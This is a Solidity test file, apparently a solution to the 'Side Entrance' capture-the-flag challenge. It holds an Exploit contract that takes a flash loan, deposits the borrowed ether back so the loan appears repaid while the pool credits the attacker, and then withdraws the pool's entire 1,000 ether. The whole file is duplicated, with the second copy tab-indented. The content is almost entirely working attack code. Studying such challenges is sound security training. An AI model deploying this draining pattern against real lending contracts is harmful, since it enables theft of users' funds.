BenFaruna/FlashLoanAttack.sol

## FlashLoanAttack.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;

import {Utilities} from "../../utils/Utilities.sol";
import "forge-std/Test.sol";

import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol";

contract Exploit {
    address sideAddr;

    constructor(address _sideAddr) {
        sideAddr = _sideAddr;
    }

    function attack(uint256 _amount) public payable {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.flashLoan(_amount);
    }

    function withdraw() public {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.withdraw();

        payable(msg.sender).call{value: address(this).balance}("");
    }

    function execute() external payable {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.deposit{value: address(this).balance}();
    }

    fallback() external payable {}
}

contract SideEntrance is Test {
    uint256 internal constant ETHER_IN_POOL = 1_000e18;

    Utilities internal utils;
    SideEntranceLenderPool internal sideEntranceLenderPool;
    address payable internal attacker;
    uint256 public attackerInitialEthBalance;

    function setUp() public {
        utils = new Utilities();
        address payable[] memory users = utils.createUsers(1);
        attacker = users[0];
        vm.label(attacker, "Attacker");

        sideEntranceLenderPool = new SideEntranceLenderPool();
        vm.label(address(sideEntranceLenderPool), "Side Entrance Lender Pool");

        vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL);

        assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL);

        attackerInitialEthBalance = address(attacker).balance;

        console.log(unicode"🧨 Let's see if you can break it... 🧨");
    }

    function testExploit() public {
        /**
         * EXPLOIT START *
         */

        Exploit exp = new Exploit(address(sideEntranceLenderPool));

        vm.startPrank(attacker);

        exp.attack(ETHER_IN_POOL);
        exp.withdraw();

        vm.stopPrank();

        /**
         * EXPLOIT END *
         */
        validation();
        console.log(unicode"\n🎉 Congratulations");
    }

    function validation() internal {
        assertEq(address(sideEntranceLenderPool).balance, 0);
        assertGt(attacker.balance, attackerInitialEthBalance);
    }
}
	// SPDX-License-Identifier: MIT
	pragma solidity >=0.8.0;

	import {Utilities} from "../../utils/Utilities.sol";
	import "forge-std/Test.sol";

	import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol";

	contract Exploit {
	address sideAddr;

	constructor(address _sideAddr) {
	sideAddr = _sideAddr;
	}

	function attack(uint256 _amount) public payable {
	SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
	side.flashLoan(_amount);
	}

	function withdraw() public {
	SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
	side.withdraw();

	payable(msg.sender).call{value: address(this).balance}("");
	}

	function execute() external payable {
	SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
	side.deposit{value: address(this).balance}();
	}

	fallback() external payable {}
	}

	contract SideEntrance is Test {
	uint256 internal constant ETHER_IN_POOL = 1_000e18;

	Utilities internal utils;
	SideEntranceLenderPool internal sideEntranceLenderPool;
	address payable internal attacker;
	uint256 public attackerInitialEthBalance;

	function setUp() public {
	utils = new Utilities();
	address payable[] memory users = utils.createUsers(1);
	attacker = users[0];
	vm.label(attacker, "Attacker");

	sideEntranceLenderPool = new SideEntranceLenderPool();
	vm.label(address(sideEntranceLenderPool), "Side Entrance Lender Pool");

	vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL);

	assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL);

	attackerInitialEthBalance = address(attacker).balance;

	console.log(unicode"🧨 Let's see if you can break it... 🧨");
	}

	function testExploit() public {
	/**
	* EXPLOIT START *
	*/

	Exploit exp = new Exploit(address(sideEntranceLenderPool));

	vm.startPrank(attacker);

	exp.attack(ETHER_IN_POOL);
	exp.withdraw();

	vm.stopPrank();

	/**
	* EXPLOIT END *
	*/
	validation();
	console.log(unicode"\n🎉 Congratulations");
	}

	function validation() internal {
	assertEq(address(sideEntranceLenderPool).balance, 0);
	assertGt(attacker.balance, attackerInitialEthBalance);
	}
	}